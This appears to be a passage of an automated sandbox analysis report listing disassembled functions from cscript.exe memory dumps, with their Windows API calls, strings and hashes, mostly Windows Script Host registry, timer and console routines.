                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004,?,?,006271FE,80000002,?), ref: 0062F9FD
                                                      • GetLastError.KERNEL32(?,?,006271FE,80000002,?), ref: 0062FA09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0062FA92
                                                      • __alloca_probe_16.LIBCMT ref: 0062FA9E
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0062FAB9
                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,006271FE,?,00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000), ref: 0062FAD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$QueryValue$CloseCreateErrorLast__alloca_probe_16
                                                      • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                      • API String ID: 907685128-512383463
                                                      • Opcode ID: 1b325c06b88bbbed4df15bccf88e8f0d6616a09b501c9d5acffae96618b691fc
                                                      • Instruction ID: bcffec636314a57ef3ba9cd684b34d680e349328f7ee621c775e2d7fd18e1ae4
                                                      • Opcode Fuzzy Hash: 1b325c06b88bbbed4df15bccf88e8f0d6616a09b501c9d5acffae96618b691fc
                                                      • Instruction Fuzzy Hash: F6510E31B44B35FBEB208B98AC46FAA7676AB04714F200135FA15FE2D0D7A4AD409FD5
                                                      Function 00627390 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000,00000000,00000001,?,00000000), ref: 006273CE
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,?,00000000), ref: 006273F6
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000001,?,00000000), ref: 00627431
                                                      • RegCloseKey.ADVAPI32(?,?,00000001,?,00000000), ref: 00627441
                                                      • RegCloseKey.ADVAPI32(00000000,?,00000001,?,00000000), ref: 0062744F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0062F6B7
                                                      • __alloca_probe_16.LIBCMT ref: 0062F6C3
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00000000), ref: 0062F6DB
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0062F6F6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 0062F71F
                                                      • __alloca_probe_16.LIBCMT ref: 0062F72B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00000000), ref: 0062F743
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000,00000000,00000000,?,00000000), ref: 0062F75E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiOpenWide$Close__alloca_probe_16$InitializeSecurity
                                                      • String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
                                                      • API String ID: 1102220367-4294085457
                                                      • Opcode ID: 0c240e527d28f53ee8d18e16663f7260b03d1d933292fe4f9aa0d0f0a526fde3
                                                      • Instruction ID: d877d7ca476835442a8d72e66781ede2a76cdcdf208ac51724c05589b7ad205a
                                                      • Opcode Fuzzy Hash: 0c240e527d28f53ee8d18e16663f7260b03d1d933292fe4f9aa0d0f0a526fde3
                                                      • Instruction Fuzzy Hash: A651B334784724BBE7205BA4BC46FAA77BBDB04B15F200124FA11BA3D1CBF4A9009ED5
                                                      Function 00631FBC Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 110memorywindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,7b,00000000,00000000,?,?,?,00000000,00000000,?,0062EC37,?), ref: 00631FE9
                                                      • LocalAlloc.KERNEL32(00000000,00000016,?,0062EC37,?), ref: 00631FFA
                                                      • GetLastError.KERNEL32(?,0062EC37,?), ref: 00632007
                                                      • swprintf_s.MSVCRT ref: 0063202E
                                                      • FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,?,0062EC37,?), ref: 00632045
                                                      • LocalAlloc.KERNEL32(00000000,0000000B,?,0062EC37,?), ref: 00632052
                                                      • sprintf_s.MSVCRT ref: 00632068
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,0062EC37,?), ref: 0063207A
                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,0062EC37,?), ref: 0063208B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,0062EC37,?), ref: 006320A5
                                                      • SysAllocString.OLEAUT32(7b), ref: 006320B6
                                                      • LocalFree.KERNEL32(00000000,?,0062EC37), ref: 006320C7
                                                      • LocalFree.KERNEL32(00000000), ref: 006320D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                                      • String ID: 0x%8X$0x%8X$7b$7b
                                                      • API String ID: 1583499379-2648932889
                                                      • Opcode ID: 2b16499420305f0040038616b23c205acd36719e76a43beca316f8e9037dbd72
                                                      • Instruction ID: 1aee55196b7d12fda21e77b7f0516c963f648741598557dc8ade67ba98fa52d2
                                                      • Opcode Fuzzy Hash: 2b16499420305f0040038616b23c205acd36719e76a43beca316f8e9037dbd72
                                                      • Instruction Fuzzy Hash: B831AF31901226FBDB395BA59C1CEEFBEBEEF41751F104015F801E22A0D7708A44EAE2
                                                      Function 006376B3 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(ScriptFile,Path,00623CB4,?,00000104,?), ref: 006376EB
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00637701
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 0063770D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                      • String ID: Path$ScriptFile
                                                      • API String ID: 3760252266-3888212790
                                                      • Opcode ID: 0de0ff1e03b8c21c2fad35f067f487311477f7f84d96c4ec0eea6a1021e605ff
                                                      • Instruction ID: b25c11ea9f7c50f71829385b84bb3d40129c81d7dc97e1532e7848d9eac4c04a
                                                      • Opcode Fuzzy Hash: 0de0ff1e03b8c21c2fad35f067f487311477f7f84d96c4ec0eea6a1021e605ff
                                                      • Instruction Fuzzy Hash: 57415EF0A046227EE7301B695C4EEBB7AAEDB45B64F150528BD51E6290DAB4CC00DAF1
                                                      Function 006268B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 166memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32 ref: 006268E3
                                                      • HeapAlloc.KERNEL32(00000000), ref: 006268EA
                                                      • VariantClear.OLEAUT32(?), ref: 00626925
                                                      • VariantClear.OLEAUT32(?), ref: 00626930
                                                      • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00626941
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0062696F
                                                      • GetStdHandle.KERNEL32(000000F5,00000000), ref: 006269F5
                                                      • VariantClear.OLEAUT32(?), ref: 00626A10
                                                      • VariantClear.OLEAUT32(?), ref: 00626A1B
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00626A28
                                                      • HeapFree.KERNEL32(00000000), ref: 00626A2F
                                                      • SysAllocString.OLEAUT32(null), ref: 0062E99D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeHandleSafeStringType
                                                      • String ID: null
                                                      • API String ID: 253374567-634125391
                                                      • Opcode ID: d2d7568d5e509fe1d9bd90f5cc775337623acd4de138988bc36c92f88cf7b161
                                                      • Instruction ID: 4f83f489c8f79030da7d4d890b749e2483ef029b3402e32fd6abf50a5224b0f5
                                                      • Opcode Fuzzy Hash: d2d7568d5e509fe1d9bd90f5cc775337623acd4de138988bc36c92f88cf7b161
                                                      • Instruction Fuzzy Hash: BC51B0729047629BC310DF64E848A5BB7AABF88710F14952DF986E7250EB31D9448BE2
                                                      Function 00637570 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileIntW.KERNEL32(Options,?,?,?), ref: 0063759B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0063755A,DisplayLogo), ref: 006375B1
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0063755A,DisplayLogo,?,00000001,?,?,006325DB,00000000,?,00000000), ref: 006375BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                      • String ID: Options
                                                      • API String ID: 1820523601-529056539
                                                      • Opcode ID: d515c7dff002288f17c838b9662890ec8647433a567e7c8ac0e465cce4c8e6bb
                                                      • Instruction ID: b7ad4f7f30c00e4d5b5a94bf624c10ea2a34f8e768fbc8c43ab48c932e59cb6f
                                                      • Opcode Fuzzy Hash: d515c7dff002288f17c838b9662890ec8647433a567e7c8ac0e465cce4c8e6bb
                                                      • Instruction Fuzzy Hash: 0B3192B1205531BA9B391B6A9C0EEFB7E6EDF063B4B150218B815E2290DE60DD00DAF1
                                                      Function 0062B9F0 Relevance: 21.3, APIs: 14, Instructions: 295memoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0062BAA7
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0062BAAE
                                                      • GetConsoleMode.KERNEL32(?,?,?,00000001,?,00000001), ref: 0062BBA5
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000001,?,00000001), ref: 0062BBC1
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0062BBFA
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0062BC21
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0062BC5E
                                                      • HeapFree.KERNEL32(00000000), ref: 0062BC65
                                                      • WriteConsoleW.KERNEL32(?,?,00003FFF,?,00000000,?,00000001,?,00000001), ref: 0062BCA1
                                                      • GetLastError.KERNEL32 ref: 0062E4D1
                                                      • GetLastError.KERNEL32 ref: 0062E521
                                                      • GetLastError.KERNEL32 ref: 0062E533
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$ErrorLast$ByteCharConsoleMultiProcessWideWrite$AllocFileFreeMode
                                                      • String ID:
                                                      • API String ID: 702828211-0
                                                      • Opcode ID: de2a1113e9b144e6995bb12f86605814fff74eff1487e3028cde39b1ae96afdf
                                                      • Instruction ID: 7ceb0b2c1615f2aa8801d93c702a94c517846072682b4676fdb4ebb841ec7843
                                                      • Opcode Fuzzy Hash: de2a1113e9b144e6995bb12f86605814fff74eff1487e3028cde39b1ae96afdf
                                                      • Instruction Fuzzy Hash: 59B1C774B007399BDB249B54EC88BEA77B6EB14300F1051B9E949EB351DF719E808F91
                                                      Function 00634621 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 183libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B172
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B183
                                                        • Part of subcall function 0062B100: LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 0063468D
                                                      • GetLastError.KERNEL32 ref: 0063469A
                                                      • GetProcAddress.KERNEL32(?,WintrustGetRegPolicyFlags), ref: 006346C0
                                                      • GetProcAddress.KERNEL32(?,WintrustSetRegPolicyFlags), ref: 006346D5
                                                      • wcsrchr.MSVCRT ref: 006346F4
                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000), ref: 00634824
                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,00000000), ref: 00634833
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$DirectoryLibrarySystemstrcpy_s$CloseErrorFreeHandleLastLoadwcsrchr
                                                      • String ID: 4$WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
                                                      • API String ID: 3203503508-3152921320
                                                      • Opcode ID: 832638981188ce40fa778ddb80ab2294f2e84399b598cc1968c66f46fbb6e798
                                                      • Instruction ID: 497ff13d590dac09676bd7fa1eeb3a349fb8b07d8f0d274321808c4ad88bc41e
                                                      • Opcode Fuzzy Hash: 832638981188ce40fa778ddb80ab2294f2e84399b598cc1968c66f46fbb6e798
                                                      • Instruction Fuzzy Hash: 6A612875D012199BCB10DFA9D884AEEFBF6FF49310F25402AE915B7350DB35A9428F90
                                                      Function 00638450 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 298libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 006384A1
                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 006384D4
                                                      • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00638512
                                                      • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0063853C
                                                      • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00638607
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                      • String ID: %s\%s$MUI
                                                      • API String ID: 1597595625-2651373239
                                                      • Opcode ID: 6069503bfd70851bb43deef0e07b3045ae792ece7907d7a75b7d115c18a684d0
                                                      • Instruction ID: 08f478e40e5b7a0808db20ae22cee658bd6d674c1d94a5ae38014970f2a60d69
                                                      • Opcode Fuzzy Hash: 6069503bfd70851bb43deef0e07b3045ae792ece7907d7a75b7d115c18a684d0
                                                      • Instruction Fuzzy Hash: F1B182B1A003699FCF759B208C54BEA73BBAB84304F0444E9F949A7251DF308E858FE5
                                                      Function 00627F70 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00628103: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 00628134
                                                        • Part of subcall function 00628070: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 006280BD
                                                      • RegCloseKey.ADVAPI32(?,?,00000400,?,?,?,?,?), ref: 00627FC5
                                                      • wcscat_s.MSVCRT ref: 00627FE4
                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00628014
                                                      • RegCloseKey.ADVAPI32(?,?,00000100), ref: 00628037
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00630356
                                                      • GetLastError.KERNEL32 ref: 00630362
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen$ByteCharErrorLastMultiQueryValueWidewcscat_s
                                                      • String ID: \ScriptEngine
                                                      • API String ID: 131889256-4133095719
                                                      • Opcode ID: 788d6d255afcd2b590dcf9eae3e8c852437c94322ba8d426317304c7adb3919a
                                                      • Instruction ID: 0a36c78e57003f36c4b4bdd00a642d7e626cca252af6b80a3c7963a231139a60
                                                      • Opcode Fuzzy Hash: 788d6d255afcd2b590dcf9eae3e8c852437c94322ba8d426317304c7adb3919a
                                                      • Instruction Fuzzy Hash: 81410930B01235AFEB305B60AC45FA676EABB08714F144158BA45E71C0DEB1DD48DFE5
                                                      Function 0062A7F0 Relevance: 18.1, APIs: 12, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?,-00000001,?,-00000004,?,?,?,006271CB,?), ref: 0062A82D
                                                      • __alloca_probe_16.LIBCMT ref: 0062A83D
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,?,?,?,?,006271CB,?), ref: 0062A84F
                                                      • VerQueryValueW.VERSION(006271CB,00623A2C,?,?,?,?,?,?,006271CB,?), ref: 0062A86D
                                                      • GetLastError.KERNEL32(?,?,?,006271CB,?), ref: 00630C2F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004,?,?,?,006271CB,?), ref: 00630C59
                                                      • __alloca_probe_16.LIBCMT ref: 00630C66
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630C8D
                                                      • GetFileVersionInfoSizeA.VERSION(?,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630C9F
                                                      • __alloca_probe_16.LIBCMT ref: 00630CAC
                                                      • GetFileVersionInfoA.VERSION(?,?,006271CB,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630CBE
                                                      • VerQueryValueA.VERSION(?,00623A90,?,?,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630CDC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 467288509-0
                                                      • Opcode ID: a478b5542222eb83183287f9a44f6add089fd42e6d65dedfda161e052daaf71c
                                                      • Instruction ID: bfa9a9f187000ae8c25fbef36a82df7f9dc0240513c1c21e4d67d968ea215a9d
                                                      • Opcode Fuzzy Hash: a478b5542222eb83183287f9a44f6add089fd42e6d65dedfda161e052daaf71c
                                                      • Instruction Fuzzy Hash: EE41A370A00219ABDB109FA5DC05BEFBBBAEF04710F241165F911E6290DB719A019FE5
                                                      Function 04BD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                      • Instruction ID: 636d964d1d49422f2b745b17b102a95622faf81f9a19f53d5bbffc03fca3a9af
                                                      • Opcode Fuzzy Hash: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                      • Instruction Fuzzy Hash: F451F4B6A04256BFDB24DFA8C88097EF7B8FF5820471081F9E455D3645E275FE508BA0
                                                      Function 04C42410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
                                                      • Instruction ID: 87de1014cf5d70382c45bca69e5da9a8ddf8866a4922d074ff8aa185092ee09b
                                                      • Opcode Fuzzy Hash: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
                                                      • Instruction Fuzzy Hash: 84510375A00645AFDB30DE9DCA9197FB7FAEF84244B048499F496D3641E6B4FB00CB60
                                                      Function 0062C390 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81windowregistryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 0062C3B4
                                                      • RegisterClassA.USER32(?), ref: 0062C3DE
                                                      • CreateWindowExA.USER32(00000000,00623ADC,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 0062C409
                                                      • SetEvent.KERNEL32(?), ref: 0062C424
                                                      • GetMessageA.USER32(?,?,00000000,00000000), ref: 0062C434
                                                      • DispatchMessageA.USER32(?), ref: 0062C449
                                                      • GetMessageA.USER32(?,?,00000000,00000000), ref: 0062C459
                                                      • SetEvent.KERNEL32(?), ref: 00631788
                                                      • GetLastError.KERNEL32 ref: 0063178E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Message$ClassEvent$CreateDispatchErrorInfoLastRegisterWindow
                                                      • String ID: WSH-Timer
                                                      • API String ID: 1152382880-2323048385
                                                      • Opcode ID: 7c81fd28ed56a556ef08c73b73dc66b7912a88d47ca5d1034172dac75f32f746
                                                      • Instruction ID: e3d8beae2b98b9d9b1151c39dbf9e490f3ef00bd70f5d90f97fcc758095f882f
                                                      • Opcode Fuzzy Hash: 7c81fd28ed56a556ef08c73b73dc66b7912a88d47ca5d1034172dac75f32f746
                                                      • Instruction Fuzzy Hash: A3314A70A04319AFDB209FE4EC49B9E7BFABB08710F244119F555E6290E7B5A5019F90
                                                      Function 0062B390 Relevance: 16.7, APIs: 11, Instructions: 170memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVersionExA.KERNEL32(?,?,00000000,?), ref: 0062B3E6
                                                      • IsTextUnicode.ADVAPI32(?,?,?), ref: 0062B414
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?), ref: 0062B439
                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0062B456
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,?), ref: 0062B480
                                                      • memmove.MSVCRT ref: 0062B4F8
                                                      • SysAllocString.OLEAUT32(00623CB4), ref: 00631298
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AllocByteCharMultiStringWide$TextUnicodeVersionmemmove
                                                      • String ID:
                                                      • API String ID: 2776485773-0
                                                      • Opcode ID: 3346886ec1ac64667748ffa57277839e2b6457b0b9a7be4e5910f022cb03fa1f
                                                      • Instruction ID: e6218fdcb21be3ecdb5f69c9dfeca73b087291b85cecc4794ff44354f1792df6
                                                      • Opcode Fuzzy Hash: 3346886ec1ac64667748ffa57277839e2b6457b0b9a7be4e5910f022cb03fa1f
                                                      • Instruction Fuzzy Hash: 0151B570900A25DBEB309F25DC49BEA77B6EF02314F105095EC49AB355C7748D85DFA1
                                                      Function 0062C2A0 Relevance: 16.6, APIs: 11, Instructions: 121timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongA.USER32(?,000000EB), ref: 0062C2AE
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0062C302
                                                      • SetWindowLongA.USER32(?,000000EB,?), ref: 0062C33C
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0062C351
                                                      • KillTimer.USER32(?,?), ref: 00631703
                                                      • GetLastError.KERNEL32 ref: 0063170D
                                                      • SetTimer.USER32(?,19771215,?,00000000), ref: 00631738
                                                      • GetLastError.KERNEL32 ref: 00631745
                                                      • KillTimer.USER32(?,?), ref: 00631762
                                                      • GetLastError.KERNEL32 ref: 0063176C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Window$ErrorLastTimer$KillLongProc
                                                      • String ID:
                                                      • API String ID: 3749527857-0
                                                      • Opcode ID: 4580a3c10d567fc5cf515cbfe8ba274833d21a2b8ae4f85e0f216a82063c4979
